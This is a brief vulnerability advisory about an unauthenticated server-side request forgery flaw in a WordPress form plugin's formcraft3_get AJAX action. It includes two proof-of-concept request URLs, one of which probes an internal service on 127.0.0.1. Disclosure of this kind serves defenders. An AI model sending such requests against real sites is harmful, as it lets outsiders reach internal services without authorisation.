The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users
https://example.com/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://wpscan.com
https://example.com/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://127.0.0.1:8181